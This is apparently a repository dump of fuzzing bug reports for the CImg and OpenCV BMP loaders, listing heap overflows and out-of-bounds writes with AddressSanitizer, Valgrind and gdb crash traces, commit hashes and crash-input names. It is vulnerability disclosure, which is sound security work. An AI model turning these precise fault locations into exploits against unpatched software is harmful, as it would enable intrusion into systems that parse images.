fa fa fa fa fa fa fa fa fa fa fa fa 298 | 0x0c4c7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 299 | 0x0c4c7fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 300 | Shadow byte legend (one shadow byte represents 8 application bytes): 301 | Addressable: 00 302 | Partially addressable: 01 02 03 04 05 06 07 303 | Heap left redzone: fa 304 | Heap right redzone: fb 305 | Freed heap region: fd 306 | Stack left redzone: f1 307 | Stack mid redzone: f2 308 | Stack right redzone: f3 309 | Stack partial redzone: f4 
310 | Stack after return: f5 311 | Stack use after scope: f8 312 | Global redzone: f9 313 | Global init order: f6 314 | Poisoned by user: f7 315 | Container overflow: fc 316 | Array cookie: ac 317 | Intra object redzone: bb 318 | ASan internal: fe 319 | ==4040==ABORTING 320 | 321 | ``` 322 | 323 | ## 7. cimg-heap-overflow-load_bmp-48427 324 | 325 | A heap overflow occurs in line 48427 in CImg.h when loading the crafted bmp file . 326 | the tested code commit is 8447076ef22322a14a0ce130837e44c5ba8095f4. 327 | 328 | ``` 329 | ================================================================= 330 | ==4043==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eff8 at pc 0x00000049418f bp 0x7ffeb2a68590 sp 0x7ffeb2a68580 331 | READ of size 1 at 0x60200000eff8 thread T0 332 | #0 0x49418e in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48427 333 | #1 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 334 | #2 0x4addc4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 335 | #3 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 336 | #4 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 337 | #5 0x40215f in main /src/CImg/fuzz-test/bmp-test.cpp:25 338 | #6 0x7f9a6f20a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 339 | #7 0x4022f8 in _start (/src/CImg/fuzz-test/bmp-test+0x4022f8) 340 | 341 | 0x60200000eff8 is located 0 bytes to the right of 8-byte region [0x60200000eff0,0x60200000eff8) 342 | allocated by thread T0 here: 343 | #0 0x7f9a6fe026b2 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x996b2) 344 | #1 0x4074fe in cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int) ../CImg.h:11379 345 | #2 0x49090a in cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int, unsigned char const&) ../CImg.h:11399 346 | #3 0x49090a in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) 
../CImg.h:48348 347 | #4 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 348 | #5 0x4addc4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 349 | #6 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 350 | #7 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 351 | #8 0x40215f in main /src/CImg/fuzz-test/bmp-test.cpp:25 352 | 353 | SUMMARY: AddressSanitizer: heap-buffer-overflow ../CImg.h:48427 cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) 354 | Shadow bytes around the buggy address: 355 | 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 356 | 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 357 | 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 358 | 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 359 | 0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 360 | =>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 00[fa] 361 | 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 362 | 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 363 | 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 364 | 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 365 | 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 366 | Shadow byte legend (one shadow byte represents 8 application bytes): 367 | Addressable: 00 368 | Partially addressable: 01 02 03 04 05 06 07 369 | Heap left redzone: fa 370 | Heap right redzone: fb 371 | Freed heap region: fd 372 | Stack left redzone: f1 373 | Stack mid redzone: f2 374 | Stack right redzone: f3 375 | Stack partial redzone: f4 376 | Stack after return: f5 377 | Stack use after scope: f8 378 | Global redzone: f9 379 | Global init order: f6 380 | Poisoned by user: f7 381 | Container overflow: fc 382 | Array cookie: ac 383 | Intra object redzone: bb 384 | ASan internal: fe 385 | ==4043==ABORTING 386 | 387 | ``` 388 | 389 | ## 8. 
cimg-heap-overflow-load_bmp-48378 390 | 391 | A heap overflow occurs in line 48378 in CImg.h when loading the crafted bmp file . 392 | the tested code commit is 8447076ef22322a14a0ce130837e44c5ba8095f4. 393 | 394 | ``` 395 | ================================================================= 396 | ==4044==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eff4 at pc 0x0000004945d0 bp 0x7ffc62183410 sp 0x7ffc62183400 397 | READ of size 1 at 0x60200000eff4 thread T0 398 | #0 0x4945cf in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48378 399 | #1 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 400 | #2 0x4addc4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 401 | #3 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 402 | #4 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 403 | #5 0x40215f in main /src/CImg/fuzz-test/bmp-test.cpp:25 404 | #6 0x7f628195382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 405 | #7 0x4022f8 in _start (/src/CImg/fuzz-test/bmp-test+0x4022f8) 406 | 407 | 0x60200000eff4 is located 0 bytes to the right of 4-byte region [0x60200000eff0,0x60200000eff4) 408 | allocated by thread T0 here: 409 | #0 0x7f628254b6b2 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x996b2) 410 | #1 0x40562f in cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int) ../CImg.h:11379 411 | #2 0x4907f4 in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48342 412 | #3 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 413 | #4 0x4addc4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 414 | #5 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 415 | #6 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 416 | #7 0x40215f in main /src/CImg/fuzz-test/bmp-test.cpp:25 417 | 418 | SUMMARY: AddressSanitizer: heap-buffer-overflow 
../CImg.h:48378 cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) 419 | Shadow bytes around the buggy address: 420 | 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 421 | 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 422 | 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 423 | 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 424 | 0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 425 | =>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[04]fa 426 | 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 427 | 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 428 | 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 429 | 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 430 | 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 431 | Shadow byte legend (one shadow byte represents 8 application bytes): 432 | Addressable: 00 433 | Partially addressable: 01 02 03 04 05 06 07 434 | Heap left redzone: fa 435 | Heap right redzone: fb 436 | Freed heap region: fd 437 | Stack left redzone: f1 438 | Stack mid redzone: f2 439 | Stack right redzone: f3 440 | Stack partial redzone: f4 441 | Stack after return: f5 442 | Stack use after scope: f8 443 | Global redzone: f9 444 | Global init order: f6 445 | Poisoned by user: f7 446 | Container overflow: fc 447 | Array cookie: ac 448 | Intra object redzone: bb 449 | ASan internal: fe 450 | ==4044==ABORTING 451 | 452 | 453 | ``` 454 | 455 | 456 | -------------------------------------------------------------------------------- /opencv/readme.md: -------------------------------------------------------------------------------- 1 | 2 | bugs of opencv 3 | ================== 4 | ** This work was done with 360 TeamSerious ** 5 | 6 | # 1. Out-of-bounds write in FillColorRow4 7 | 8 | An out-of-bounds write occurs when the crafted file is read with cv::imread. 
9 | 10 | ``` 11 | ==14475== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 12 | ==14475== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 13 | ==14475== Command: ./gtest.elf ../../../fuzz-tests/GaussianBlur-test/out/crashes/id:000001,sig:06,src:000001,op:flip1,pos:21 14 | ==14475== 15 | ==14475== Warning: set address range perms: large range [0x3a044040, 0xfa044c88) (undefined) 16 | ==14475== Invalid write of size 4 17 | ==14475== at 0x514CBC3: FillColorRow4(unsigned char*, unsigned char*, int, PaletteEntry*) (utils.cpp:496) 18 | ==14475== by 0x5169284: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:251) 19 | ==14475== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 20 | ==14475== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 21 | ==14475== by 0x400DFA: main (33_GaussianBlur.cpp:34) 22 | ==14475== Address 0xfffffffff4044c20 is not stack'd, malloc'd or (recently) free'd 23 | ==14475== 24 | ==14475== 25 | ==14475== Process terminating with default action of signal 11 (SIGSEGV) 26 | ==14475== Access not within mapped region at address 0xFFFFFFFFF4044C20 27 | ==14475== at 0x514CBC3: FillColorRow4(unsigned char*, unsigned char*, int, PaletteEntry*) (utils.cpp:496) 28 | ==14475== by 0x5169284: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:251) 29 | ==14475== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 30 | ==14475== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 31 | ==14475== by 0x400DFA: main (33_GaussianBlur.cpp:34) 32 | ==14475== If you believe this happened as a result of a stack 33 | ==14475== overflow in your program's main thread (unlikely but 34 | ==14475== possible), you can try to increase the size of the 35 | ==14475== main thread stack using the --main-stacksize= flag. 36 | ==14475== The main thread stack size used in this run was 8388608. 
37 | ==14475== 38 | ==14475== HEAP SUMMARY: 39 | ==14475== in use at exit: 3,238,103,506 bytes in 397 blocks 40 | ==14475== total heap usage: 458 allocs, 61 frees, 3,238,113,514 bytes allocated 41 | ==14475== 42 | ==14475== LEAK SUMMARY: 43 | ==14475== definitely lost: 0 bytes in 0 blocks 44 | ==14475== indirectly lost: 0 bytes in 0 blocks 45 | ==14475== possibly lost: 3,221,236,783 bytes in 114 blocks 46 | ==14475== still reachable: 16,866,723 bytes in 283 blocks 47 | ==14475== suppressed: 0 bytes in 0 blocks 48 | ==14475== Rerun with --leak-check=full to see details of leaked memory 49 | ==14475== 50 | ==14475== For counts of detected and suppressed errors, rerun with: -v 51 | ==14475== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) 52 | Segmentation fault 53 | 54 | ``` 55 | 56 | # 2. A heap-based buffer overflow results in an invalid write in fseek. 57 | 58 | ``` 59 | ==25260== Memcheck, a memory error detector 60 | ==25260== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 
61 | ==25260== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 62 | ==25260== Command: ./gtest.elf ../../../fuzz-tests/GaussianBlur-test/out/crashes/id:000002,sig:06,src:000001,op:flip1,pos:47 63 | ==25260== 64 | ==25260== Invalid write of size 2 65 | ==25260== at 0x4C2F7E3: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 66 | ==25260== by 0x5178F29: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:235) 67 | ==25260== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 68 | ==25260== by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 69 | ==25260== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 70 | ==25260== by 0x400DFA: main (33_GaussianBlur.cpp:34) 71 | ==25260== Address 0xecb66c0 is 0 bytes after a block of size 1,264 alloc'd 72 | ==25260== at 0x4C2B0E0: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 73 | ==25260== by 0x513AD5C: cv::Ptr cv::makePtr() (ptr.inl.hpp:301) 74 | ==25260== by 0x5167CE3: cv::BmpDecoder::newDecoder() const (grfmt_bmp.cpp:76) 75 | ==25260== by 0x51322DB: cv::findDecoder(cv::String const&) (loadsave.cpp:199) 76 | ==25260== by 0x5134301: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:384) 77 | ==25260== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 78 | ==25260== by 0x400DFA: main (33_GaussianBlur.cpp:34) 79 | ==25260== 80 | ==25260== Source and destination overlap in memcpy(0xecb676a, 0xecb67f0, 632) 81 | ==25260== at 0x4C2F71C: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 82 | ==25260== by 0x5178F29: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:235) 83 | ==25260== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 84 | ==25260== by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 85 | ==25260== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 86 | 
==25260== by 0x400DFA: main (33_GaussianBlur.cpp:34) 87 | ==25260== 88 | ==25260== Invalid read of size 8 89 | ==25260== at 0x74928F5: fseek (fseek.c:38) 90 | ==25260== by 0x51784A6: cv::RBaseStream::readBlock() (bitstrm.cpp:104) 91 | ==25260== by 0x5178F9E: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:233) 92 | ==25260== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 93 | ==25260== by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 94 | ==25260== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 95 | ==25260== by 0x400DFA: main (33_GaussianBlur.cpp:34) 96 | ==25260== Address 0x33333333333303b is not stack'd, malloc'd or (recently) free'd 97 | ==25260== 98 | ==25260== 99 | ==25260== Process terminating with default action of signal 11 (SIGSEGV) 100 | ==25260== General Protection Fault 101 | ==25260== at 0x74928F5: fseek (fseek.c:38) 102 | ==25260== by 0x51784A6: cv::RBaseStream::readBlock() (bitstrm.cpp:104) 103 | ==25260== by 0x5178F9E: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:233) 104 | ==25260== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 105 | ==25260== by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 106 | ==25260== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 107 | ==25260== by 0x400DFA: main (33_GaussianBlur.cpp:34) 108 | ==25260== Invalid read of size 8 109 | ==25260== at 0x749CF52: _IO_flush_all_lockp (genops.c:844) 110 | ==25260== by 0x749D0C9: _IO_cleanup (genops.c:1013) 111 | ==25260== by 0x7589DBA: __libc_freeres (in /lib/x86_64-linux-gnu/libc-2.19.so) 112 | ==25260== by 0x4A256BC: _vgnU_freeres (in /usr/lib/valgrind/vgpreload_core-amd64-linux.so) 113 | ==25260== by 0xFFF0002DF: ??? 
114 | ==25260== Address 0x3311110000030018 is not stack'd, malloc'd or (recently) free'd 115 | ==25260== 116 | ==25260== 117 | ==25260== Process terminating with default action of signal 11 (SIGSEGV) 118 | ==25260== General Protection Fault 119 | ==25260== at 0x749CF52: _IO_flush_all_lockp (genops.c:844) 120 | ==25260== by 0x749D0C9: _IO_cleanup (genops.c:1013) 121 | ==25260== by 0x7589DBA: __libc_freeres (in /lib/x86_64-linux-gnu/libc-2.19.so) 122 | ==25260== by 0x4A256BC: _vgnU_freeres (in /usr/lib/valgrind/vgpreload_core-amd64-linux.so) 123 | ==25260== by 0xFFF0002DF: ??? 124 | ==25260== 125 | ==25260== HEAP SUMMARY: 126 | ==25260== in use at exit: 97,530 bytes in 393 blocks 127 | ==25260== total heap usage: 454 allocs, 61 frees, 107,538 bytes allocated 128 | ==25260== 129 | ==25260== LEAK SUMMARY: 130 | ==25260== definitely lost: 0 bytes in 0 blocks 131 | ==25260== indirectly lost: 0 bytes in 0 blocks 132 | ==25260== possibly lost: 8,167 bytes in 113 blocks 133 | ==25260== still reachable: 89,363 bytes in 280 blocks 134 | ==25260== suppressed: 0 bytes in 0 blocks 135 | ==25260== Rerun with --leak-check=full to see details of leaked memory 136 | ==25260== 137 | ==25260== For counts of detected and suppressed errors, rerun with: -v 138 | ==25260== ERROR SUMMARY: 260 errors from 4 contexts (suppressed: 0 from 0) 139 | Segmentation fault 140 | ``` 141 | 142 | # 3. 
out-of-bound write in FillColorRow8 143 | The faulting address (0xfffffffff4044c20) is nowhere near any mapping, and a ~3 GB image buffer was allocated just before (the "set address range perms: large range" warning), which suggests the write target is computed from header-controlled image dimensions rather than being a small overrun of the row buffer. The same pattern (wild write address, multi-gigabyte buffer) appears in #5, #6 and #7. 144 | ``` 145 | ==15589== Memcheck, a memory error detector 146 | ==15589== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. ==15589== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 147 | ==15589== Command: ./opencv_test.elf ../../../fuzz-tests/medianBlur-test/out/crashes/id:000017,sig:06,src:000083,op:flip1,pos:21 148 | ==15589== 149 | ==15589== Warning: set address range perms: large range [0x3a044040, 0xfa044c88) (undefined) ==15589== Invalid write of size 4 150 | ==15589== at 0x514CA25: FillColorRow8(unsigned char*, unsigned char*, int, PaletteEntry*) (utils.cpp:470) 151 | ==15589== by 0x5169A00: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:339) 152 | ==15589== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 153 | ==15589== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 154 | ==15589== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 155 | ==15589== Address 0xfffffffff4044c20 is not stack'd, malloc'd or (recently) free'd 156 | ==15589== 157 | ==15589== 158 | ==15589== Process terminating with default action of signal 11 (SIGSEGV) 159 | ==15589== Access not within mapped region at address 0xFFFFFFFFF4044C20 160 | ==15589== at 0x514CA25: FillColorRow8(unsigned char*, unsigned char*, int, PaletteEntry*) (utils.cpp:470) 161 | ==15589== by 0x5169A00: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:339) 162 | ==15589== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 163 | ==15589== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 164 | ==15589== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 165 | ==15589== If you believe this happened as a result of a stack 166 | ==15589== overflow in your program's main thread 
(unlikely but 167 | ==15589== possible), you can try to increase the size of the 168 | ==15589== main thread stack using the --main-stacksize= flag. 169 | ==15589== The main thread stack size used in this run was 8388608. 170 | ==15589== 171 | ==15589== HEAP SUMMARY: 172 | ==15589== in use at exit: 3,254,880,734 bytes in 397 blocks 173 | ==15589== total heap usage: 458 allocs, 61 frees, 3,254,890,742 bytes allocated 174 | ==15589== 175 | ==15589== LEAK SUMMARY: 176 | ==15589== definitely lost: 0 bytes in 0 blocks 177 | ==15589== indirectly lost: 0 bytes in 0 blocks 178 | ==15589== possibly lost: 3,221,236,779 bytes in 114 blocks 179 | ==15589== still reachable: 33,643,955 bytes in 283 blocks 180 | ==15589== suppressed: 0 bytes in 0 blocks 181 | ==15589== Rerun with --leak-check=full to see details of leaked memory 182 | ==15589== 183 | ==15589== For counts of detected and suppressed errors, rerun with: -v 184 | ==15589== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) 185 | Segmentation fault 186 | 187 | ``` 188 | 189 | # 4. 
buffer overflow in cv::BmpDecoder::readData (memcpy) 190 | 191 | ``` 192 | Stopped reason: SIGSEGV 193 | [----------------------------------registers-----------------------------------] 194 | RAX: 0xffffffffc0000060 195 | RBX: 0x0 196 | RCX: 0x1850 197 | RDX: 0xffffffffc0000060 198 | RSI: 0x7fffffffd7b0 ('3' ) 199 | RDI: 0x7fe82df73be0 ('3' ) 200 | RBP: 0x7fffffffe310 --> 0x0 201 | RSP: 0x7fffffffd5e8 --> 0x7ffff763e62d (: mov rax,QWORD PTR [rip+0x511044] # 0x7ffff7b4f678 <__gcov0._ZN2cv10BmpDecoder8readDataERNS_3MatE+1176>) 202 | RIP: 0x7ffff54c1ba4 (<__memcpy_sse2_unaligned+372>: movdqu xmm8,XMMWORD PTR [rsi+rcx*1]) 203 | R8 : 0x185 204 | R9 : 0xffffffffc000006 205 | R10: 0x7fffffffd3b0 --> 0x0 206 | R11: 0x7ffff7603320 (: sub rsp,0x8) 207 | R12: 0x400c40 (<_start>: xor ebp,ebp) 208 | R13: 0x7fffffffe3f0 --> 0x2 209 | R14: 0x0 210 | R15: 0x0 211 | EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) 212 | [-------------------------------------code-------------------------------------] 213 | 0x7ffff54c1b99 <__memcpy_sse2_unaligned+361>: je 0x7ffff54c1c32 <__memcpy_sse2_unaligned+514> 214 | 0x7ffff54c1b9f <__memcpy_sse2_unaligned+367>: xor ecx,ecx 215 | 0x7ffff54c1ba1 <__memcpy_sse2_unaligned+369>: xor r8d,r8d 216 | => 0x7ffff54c1ba4 <__memcpy_sse2_unaligned+372>: movdqu xmm8,XMMWORD PTR [rsi+rcx*1] 217 | 0x7ffff54c1baa <__memcpy_sse2_unaligned+378>: add r8,0x1 218 | 0x7ffff54c1bae <__memcpy_sse2_unaligned+382>: movdqu XMMWORD PTR [rdi+rcx*1],xmm8 219 | 0x7ffff54c1bb4 <__memcpy_sse2_unaligned+388>: add rcx,0x10 220 | 0x7ffff54c1bb8 <__memcpy_sse2_unaligned+392>: cmp r9,r8 221 | [------------------------------------stack-------------------------------------] 222 | 0000| 0x7fffffffd5e8 --> 0x7ffff763e62d (: mov rax,QWORD PTR [rip+0x511044] # 0x7ffff7b4f678 <__gcov0._ZN2cv10BmpDecoder8readDataERNS_3MatE+1176>) 223 | 0008| 0x7fffffffd5f0 --> 0x1201204800000001 224 | 0016| 0x7fffffffd5f8 --> 0x7ffff7fe2158 --> 0x7ffff149c000 --> 
0x10102464c457f 225 | 0024| 0x7fffffffd600 --> 0x7fffffffe240 --> 0x242ff4010 226 | 0032| 0x7fffffffd608 --> 0x6150a0 --> 0x7ffff7a9ce50 --> 0x7ffff763bb24 (: push rbx) 227 | 0040| 0x7fffffffd610 --> 0x7ffff4de7cb0 --> 0x1 228 | 0048| 0x7fffffffd618 --> 0x1007ffff7de7ea5 229 | 0056| 0x7fffffffd620 --> 0x7ffff7feb4e8 --> 0x7ffff5427000 --> 0x10102464c457f 230 | [------------------------------------------------------------------------------] 231 | Legend: code, data, rodata, value 232 | Stopped reason: SIGSEGV 233 | __memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:116 234 | 116 ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory. 235 | gdb-peda$ bt 236 | #0 __memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:116 237 | #1 0x00007ffff763e62d in cv::BmpDecoder::readData (this=0x6150a0, img=...) at /data/xqx/tests/opencv-test/opencv/modules/imgcodecs/src/grfmt_bmp.cpp:463 238 | #2 0x00007ffff7608a8c in cv::imread_ (filename=..., flags=0x1, hdrtype=0x2, mat=0x7fffffffe240) at /data/xqx/tests/opencv-test/opencv/modules/imgcodecs/src/loadsave.cpp:454 239 | #3 0x00007ffff7609742 in cv::imread (filename=..., flags=0x1) at /data/xqx/tests/opencv-test/opencv/modules/imgcodecs/src/loadsave.cpp:565 240 | #4 0x0000000000400d91 in main () 241 | #5 0x00007ffff5448f45 in __libc_start_main (main=0x400d2d
, argc=0x2, argv=0x7fffffffe3f8, init=, fini=, rtld_fini=, stack_end=0x7fffffffe3e8) at libc-start.c:287 242 | #6 0x0000000000400c69 in _start () 243 | gdb-peda$ 244 | 245 | ``` 246 | 247 | # 5. out-of-bound write in FillColorRow1 248 | 249 | ``` 250 | ==21776== Memcheck, a memory error detector 251 | ==21776== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 252 | ==21776== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 253 | ==21776== Command: ./opencv_test.elf ../../../fuzz-tests/medianBlur-test/out/crashes/id:000023,sig:06,src:000185,op:ext_AO,pos:23 254 | ==21776== 255 | ==21776== Warning: set address range perms: large range [0x3a044040, 0xe5f690a8) (undefined) 256 | ==21776== Invalid write of size 4 257 | ==21776== at 0x514CED2: FillColorRow1(unsigned char*, unsigned char*, int, PaletteEntry*) (utils.cpp:543) 258 | ==21776== by 0x51690BC: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:236) 259 | ==21776== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 260 | ==21776== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 261 | ==21776== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 262 | ==21776== Address 0xffffffffe5f68fd7 is not stack'd, malloc'd or (recently) free'd 263 | ==21776== 264 | ==21776== 265 | ==21776== Process terminating with default action of signal 11 (SIGSEGV) 266 | ==21776== Access not within mapped region at address 0xFFFFFFFFE5F68FD7 267 | ==21776== at 0x514CED2: FillColorRow1(unsigned char*, unsigned char*, int, PaletteEntry*) (utils.cpp:543) 268 | ==21776== by 0x51690BC: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:236) 269 | ==21776== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 270 | ==21776== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 271 | ==21776== by 0x400D90: main (in 
/data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 272 | ==21776== If you believe this happened as a result of a stack 273 | ==21776== overflow in your program's main thread (unlikely but 274 | ==21776== possible), you can try to increase the size of the 275 | ==21776== main thread stack using the --main-stacksize= flag. 276 | ==21776== The main thread stack size used in this run was 8388608. 277 | ==21776== 278 | ==21776== HEAP SUMMARY: 279 | ==21776== in use at exit: 2,884,881,858 bytes in 396 blocks 280 | ==21776== total heap usage: 457 allocs, 61 frees, 2,884,891,866 bytes allocated 281 | ==21776== 282 | ==21776== LEAK SUMMARY: 283 | ==21776== definitely lost: 0 bytes in 0 blocks 284 | ==21776== indirectly lost: 0 bytes in 0 blocks 285 | ==21776== possibly lost: 2,884,792,399 bytes in 114 blocks 286 | ==21776== still reachable: 89,459 bytes in 282 blocks 287 | ==21776== suppressed: 0 bytes in 0 blocks 288 | ==21776== Rerun with --leak-check=full to see details of leaked memory 289 | ==21776== 290 | ==21776== For counts of detected and suppressed errors, rerun with: -v 291 | ==21776== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) 292 | Segmentation fault 293 | 294 | ``` 295 | 296 | # 6. out-of-bound write in readData 297 | 298 | ``` 299 | ==24457== Memcheck, a memory error detector==24457== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 
